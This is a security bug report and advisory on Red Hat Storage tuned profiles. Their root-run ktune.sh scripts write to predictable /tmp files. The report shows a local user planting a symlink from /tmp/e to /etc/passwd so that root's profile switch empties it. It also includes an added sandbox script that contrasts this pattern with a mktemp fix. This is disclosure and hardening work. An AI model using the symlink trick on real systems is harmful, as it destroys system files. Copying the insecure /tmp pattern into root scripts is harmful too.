Gowrishankar Rajaiyan (grajaiya) reports:

I found a potential security issue with redhat-storage-server-1.7.3-2.el6rhs.noarch (previously known as appliance-base-1.7.3-1.el6rhs) while verifying https://bugzilla.redhat.com/show_bug.cgi?id=910566. This issue also exists in the latest released version of RHS: https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689

Description:

As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh and /etc/tune-profiles/rhs-virtualization/ktune.sh:

<snip>
for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
</snip>

A file "e" is created in the /tmp directory. This information is public at https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13 (I set it to private now, not sure if that helps).

So any normal user can create a softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as the root user, hence this exposes a security loophole wherein a normal user can wipe out /etc/passwd. Please guide on how to proceed from here.

A demonstration is as follows:

As normal user:

[shanks@localhost ~]$ id
uid=500(shanks) gid=500(shanks) groups=500(shanks)
[shanks@localhost ~]$ cd /tmp/
[shanks@localhost tmp]$ ln -s /etc/passwd e
[shanks@localhost tmp]$ ls -l
total 4
lrwxrwxrwx  1 shanks shanks  11 Jul 19 12:49 e -> /etc/passwd
-rwx------. 1 root   root   391 Jul 19 09:04 ks-script-QuMjt3
-rwxr-xr-x. 1 root   root     0 Jul 19 09:04 ks-script-QuMjt3.log
-rw-------  1 root   root     0 Jul 19 09:04 tmp.ta4401DZd7
-rw-------. 1 root   root     0 Jul 19 08:54 yum.log
[shanks@localhost tmp]$

As root:

[root@localhost ~]# tuned-adm profile rhs-high-throughput
Reverting to saved sysctl settings:                                [  OK  ]
Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on brick devices: [  OK  ]
Reverting to cfq elevator: dm-0 dm-1                               [  OK  ]
Stopping tuned:                                                    [  OK  ]
Switching to profile 'rhs-high-throughput'
Applying ktune sysctl settings:
/etc/ktune.d/tunedadm.conf:                                        [  OK  ]
Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on brick devices: [  OK  ]
Applying sysctl settings from /etc/sysctl.conf
Applying deadline elevator: dm-0 dm-1                              [  OK  ]
Starting tuned: 'import site' failed; use -v for traceback         [  OK  ]
[root@localhost ~]# cat /etc/passwd
[root@localhost ~]#

Also there appear to be more vulnerabilities:

/etc/tune-profiles/rhs-virtualization/ktune.sh:    bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-virtualization/ktune.sh:    for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-virtualization/ktune.sh:    done) 2>> /tmp/bricks.err
/etc/tune-profiles/rhs-virtualization/ktune.sh:    echo '* hard nofile 16384' ) > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:    mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:    grep -v 'soft nofile' $limits_conf | grep -v 'hard nofile' > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:    mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-high-throughput/ktune.sh:   bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-high-throughput/ktune.sh:   for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-high-throughput/ktune.sh:   done) 2>> /tmp/bricks.err
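The mechanism behind the report, as an added example that is not part of the bug report or of the tuned profiles: the `find ... 2>/tmp/e` pattern from ktune.sh beside a mktemp-based replacement, both exercised in a private sandbox directory so the symlink-following behaviour can be observed without root. A third function greps a script for hard-coded /tmp paths, the check the reporter ran by hand over the two ktune.sh files. The function names, the sandbox layout and the sample script lines are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not code from the Red Hat bug report or from tuned.
# Everything below works in a throwaway directory that stands in for /tmp.

# Vulnerable pattern, as in ktune.sh.  The shell performs the redirection
# `2>/tmp/e` with open(O_CREAT|O_TRUNC) *before* find runs, and open(2)
# follows symlinks.  If an unprivileged user pre-planted /tmp/e -> /etc/passwd,
# root's shell truncates /etc/passwd even though find writes nothing to stderr.
vulnerable_collect() {
    tmp=$1       # stands in for /tmp
    volroot=$2   # stands in for /var/lib/glusterd/vols
    find "$volroot" -name bricks -type d 2>"$tmp/e"
}

# Hardened pattern.  mktemp(1) creates the file itself with O_CREAT|O_EXCL and
# mode 0600 under an unpredictable name, so there is no pre-existing path for
# an attacker to replace with a symlink, and a planted link at a guessed name
# makes the O_EXCL open fail rather than being followed.
hardened_collect() {
    tmp=$1
    volroot=$2
    errfile=$(mktemp "$tmp/e.XXXXXX") || return 1
    find "$volroot" -name bricks -type d 2>"$errfile"
    rm -f "$errfile"
}

# Build a sandbox that mirrors the report: a "passwd" file to protect and the
# symlink an unprivileged user would plant at the predictable temp name.
# Prints the sandbox path.
make_sandbox() {
    dir=$(mktemp -d) || return 1
    mkdir "$dir/vols"                     # empty volume tree: find succeeds silently
    printf 'root:x:0:0:root:/root:/bin/bash\n' >"$dir/passwd"
    ln -s "$dir/passwd" "$dir/e"          # the attacker's ln -s /etc/passwd e
    printf '%s\n' "$dir"
}

# Audit helper: list lines of a script that name a fixed path under /tmp.
# Prints "lineno:line" for each hit (grep -n), nothing when the script is clean.
audit_tmp_paths() {
    grep -nE '(^|[^[:alnum:]_])/tmp/[A-Za-z0-9._-]+' "$1"
}

# Stand-alone demonstration: the sandbox "passwd" ends up empty after the
# vulnerable call and keeps its contents after the hardened one.
demo() {
    d=$(make_sandbox)
    vulnerable_collect "$d" "$d/vols"
    printf 'vulnerable: passwd is now %s bytes\n' "$(wc -c <"$d/passwd" | tr -d ' ')"
    rm -rf "$d"
    d=$(make_sandbox)
    hardened_collect "$d" "$d/vols"
    printf 'hardened:   passwd is still %s bytes\n' "$(wc -c <"$d/passwd" | tr -d ' ')"
    rm -rf "$d"
}

demo
```

The point the sandbox makes is that no error message is needed for the damage to occur: the redirection truncates the symlink's target whether or not find ever writes to stderr, which is why the report's `cat /etc/passwd` prints nothing after a profile switch that reported only `[ OK ]`. The same reasoning applies to the `> /tmp/limits.conf` and `2>> /tmp/bricks.err` lines in the grep output above (an append redirection does not truncate, but it still follows the link and lets the user choose which root-owned file receives the script's error text).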
Acknowledgements: These issues were discovered by Gowrishankar Rajaiyan of Red Hat and Kurt Seifried of the Red Hat Security Response Team.
This issue has been addressed in the following products: Red Hat Storage 2.0, via RHSA-2013:1205 https://rhn.redhat.com/errata/RHSA-2013-1205.html